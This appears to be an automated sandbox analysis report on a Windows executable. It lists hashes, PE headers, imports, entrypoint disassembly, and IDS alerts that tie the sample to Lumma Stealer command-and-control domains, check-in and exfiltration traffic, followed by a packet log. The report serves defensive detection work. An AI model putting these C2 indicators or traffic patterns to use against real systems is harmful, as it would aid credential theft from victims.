                                                                                                                                                                                                                                                                                        SHA512:fe40d233549ca6087b709f800a0071f8408adb32537e296764b058d347d9e90db21d63b78e64e2012c503ffa147bde55061c8658f57711e22251d82dc97f90ec
                                                                                                                                                                                                                                                                                        SSDEEP:6144:gl+Twm5nNUAm83eJqbyIkPoVJb9GOgQRBq3:gAUGNUAy+Lz9G5QRBA
                                                                                                                                                                                                                                                                                        TLSH:8C84AE6179F19025FFF74B3116709AA019FFBCA3AA74818F2290369E1E733918A65713
                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......).`.mq..mq..mq...>..oq..s#..sq..s#..yq..s#...q..J.u.jq..mq...q..s#..lq..s#..lq..s#..lq..Richmq..................PE..L....p.f...

                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                        Icon Hash:8f97312d3125191a

                                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                        Entrypoint:0x401453
                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                        Time Stamp:0x660A7013 [Mon Apr 1 08:28:03 2024 UTC]
                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                        Import Hash:9662782e6e9e28f2f28849063179bc57

                                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                        call 00007FAECCB25019h
                                                                                                                                                                                                                                                                                        jmp 00007FAECCB228FDh
                                                                                                                                                                                                                                                                                        mov edi, edi
                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                                                                                        sub esp, 00000328h
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B398h], eax
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B394h], ecx
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B390h], edx
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B38Ch], ebx
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B388h], esi
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B384h], edi
                                                                                                                                                                                                                                                                                        mov word ptr [0044B3B0h], ss
                                                                                                                                                                                                                                                                                        mov word ptr [0044B3A4h], cs
                                                                                                                                                                                                                                                                                        mov word ptr [0044B380h], ds
                                                                                                                                                                                                                                                                                        mov word ptr [0044B37Ch], es
                                                                                                                                                                                                                                                                                        mov word ptr [0044B378h], fs
                                                                                                                                                                                                                                                                                        mov word ptr [0044B374h], gs
                                                                                                                                                                                                                                                                                        pushfd
                                                                                                                                                                                                                                                                                        pop dword ptr [0044B3A8h]
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B39Ch], eax
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B3A0h], eax
                                                                                                                                                                                                                                                                                        lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B3ACh], eax
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B2E8h], 00010001h
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [0044B3A0h]
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B29Ch], eax
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B290h], C0000409h
                                                                                                                                                                                                                                                                                        mov dword ptr [0044B294h], 00000001h
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [00444004h]
                                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                                                        mov eax, dword ptr [00444008h]
                                                                                                                                                                                                                                                                                        mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                                                        call dword ptr [000000BCh]

                                                                                                                                                                                                                                                                                        Rich Headers

                                                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                                                        • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                                                        • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                                        • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                                        • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                                        • [LNK] VS2008 build 21022

                                                                                                                                                                                                                                                                                        Data Directories

                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x4285c0x50.rdata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x4230000xe788.rsrc
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x410000x19c.rdata
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                        .text0x10000x3f27c0x3f400773e5c30d0157ec67237a50dfc85169bFalse0.8036839179841897data7.370191608980691IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                        .rdata0x410000x21a20x2200b992d8cda7cc3912e9083c2d36e29780False0.3636259191176471data5.5497409982727115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                        .data0x440000x3decd80xb800d228d385cc330146f21b5d24eed31a3funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                        .rsrc0x4230000xe7880xe8006eb676daaf8ad44e897baed4e336f2e5False0.40476831896551724data4.4988829579035885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                        RT_CURSOR0x429e880x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                                                                                                                                                                                                        RT_CURSOR0x429fd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                                                                                                                                                                                        RT_CURSOR0x42a1000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                                                                                                                                                                                        RT_ICON0x4236300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.552771855010661
                                                                                                                                                                                                                                                                                        RT_ICON0x4244d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.6146209386281588
                                                                                                                                                                                                                                                                                        RT_ICON0x424d800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.6474654377880185
                                                                                                                                                                                                                                                                                        RT_ICON0x4254480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.6697976878612717
                                                                                                                                                                                                                                                                                        RT_ICON0x4259b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4378630705394191
                                                                                                                                                                                                                                                                                        RT_ICON0x427f580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5117260787992496
                                                                                                                                                                                                                                                                                        RT_ICON0x4290000x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.5172131147540984
                                                                                                                                                                                                                                                                                        RT_ICON0x4299880x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.6108156028368794
                                                                                                                                                                                                                                                                                        RT_STRING0x42c8880x454data0.45126353790613716
                                                                                                                                                                                                                                                                                        RT_STRING0x42cce00x126data0.5238095238095238
                                                                                                                                                                                                                                                                                        RT_STRING0x42ce080x656data0.436498150431566
                                                                                                                                                                                                                                                                                        RT_STRING0x42d4600x74cdata0.43147751605995716
                                                                                                                                                                                                                                                                                        RT_STRING0x42dbb00x6a4data0.4376470588235294
                                                                                                                                                                                                                                                                                        RT_STRING0x42e2580x74cdata0.4229122055674518
                                                                                                                                                                                                                                                                                        RT_STRING0x42e9a80x70edata0.4330011074197121
                                                                                                                                                                                                                                                                                        RT_STRING0x42f0b80x84edata0.4195672624647225
                                                                                                                                                                                                                                                                                        RT_STRING0x42f9080x662data0.43512851897184823
                                                                                                                                                                                                                                                                                        RT_STRING0x42ff700x964data0.4068219633943428
                                                                                                                                                                                                                                                                                        RT_STRING0x4308d80x66edata0.4356014580801944
                                                                                                                                                                                                                                                                                        RT_STRING0x430f480x60adata0.444372574385511
                                                                                                                                                                                                                                                                                        RT_STRING0x4315580x22adata0.47653429602888087
                                                                                                                                                                                                                                                                                        RT_ACCELERATOR0x429e680x20data1.15625
                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x429fb80x14data1.15
                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x42c6a80x22data1.088235294117647
                                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x429df00x76data0.6610169491525424
                                                                                                                                                                                                                                                                                        RT_VERSION0x42c6d00x1b4data0.573394495412844

                                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                                        KERNEL32.dllDeleteVolumeMountPointA, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, GetComputerNameW, GetModuleHandleW, GetDateFormatA, LoadLibraryW, GetConsoleMode, ReadProcessMemory, GetTimeFormatW, GetConsoleAliasW, CreateProcessA, GetAtomNameW, GetStartupInfoW, GetShortPathNameA, SetLastError, GetProcAddress, SearchPathA, PulseEvent, BuildCommDCBW, GetNumaHighestNodeNumber, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, LocalAlloc, AddAtomA, FoldStringW, SetLocaleInfoW, RequestWakeupLatency, WriteConsoleOutputAttribute, FindFirstVolumeA, FindAtomW, UnregisterWaitEx, OpenFileMappingA, CreateFileA, WriteConsoleW, SetFileAttributesA, GetCommandLineW, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, DeleteCriticalSection, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, LeaveCriticalSection, EnterCriticalSection, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, HeapSize, ReadFile, GetConsoleCP, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA, GetConsoleOutputCP, GetModuleHandleA
                                                                                                                                                                                                                                                                                        USER32.dllGetClassLongW
                                                                                                                                                                                                                                                                                        GDI32.dllGetBitmapBits

                                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:15.286974+01002058576ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz)1192.168.2.8633571.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:15.432014+01002058584ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz)1192.168.2.8557111.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:15.573887+01002058586ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz)1192.168.2.8507751.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:15.715330+01002058588ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz)1192.168.2.8583801.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:15.857537+01002058580ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz)1192.168.2.8619931.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:16.000648+01002058590ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz)1192.168.2.8604871.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:16.144554+01002058572ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz)1192.168.2.8501021.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:16.294003+01002058578ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz)1192.168.2.8541581.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:18.031260+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84970623.55.153.106443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:18.814081+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.84970623.55.153.106443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:20.443634+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:21.198377+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:21.198377+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:22.525521+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:23.309324+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:23.309324+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849708172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:25.031841+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:25.937122+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849709172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:27.299569+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710172.67.157.254443TCP
                                                                                                                                                                                                                                                                                        2024-12-28T10:05:29.962225+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711172.67.157.254443TCP

                                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.584153891 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.584209919 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.584302902 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.587308884 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.587326050 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.031179905 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.031260014 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.033910036 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.033932924 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.034197092 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.077202082 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.089616060 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.135334969 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814119101 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814138889 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814171076 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814182043 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814186096 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814208984 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814222097 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814230919 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814239025 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:18.814263105 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001334906 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001385927 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001446009 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001475096 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.001517057 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032476902 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032515049 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032551050 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032553911 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.032603025 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035080910 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035095930 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035126925 CET49706443192.168.2.823.55.153.106
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.035131931 CET4434970623.55.153.106192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181129932 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181169033 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181313038 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181657076 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.181664944 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.443536997 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.443634033 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.522727013 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.522747040 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.523045063 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.524142027 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.524168968 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:20.524205923 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198374987 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198467970 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198509932 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198972940 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.198992968 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.199014902 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.199022055 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267256975 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267332077 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267400026 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267944098 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:21.267957926 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.525435925 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.525521040 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.526719093 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.526731014 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.526932955 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.528119087 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.528141022 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:22.528182983 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309338093 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309402943 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309428930 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309456110 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309457064 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309488058 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.309504032 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317800045 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317846060 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317853928 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317874908 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.317913055 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.326210022 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.367263079 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.367296934 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.423429012 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.428916931 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.483431101 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.483474970 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.514975071 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.515012980 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.515063047 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.515099049 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.515150070 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.522872925 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.522984028 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.523045063 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.525798082 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.525829077 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.525851011 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.525859118 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.769377947 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.769427061 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.769493103 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.769897938 CET49709443192.168.2.8172.67.157.254
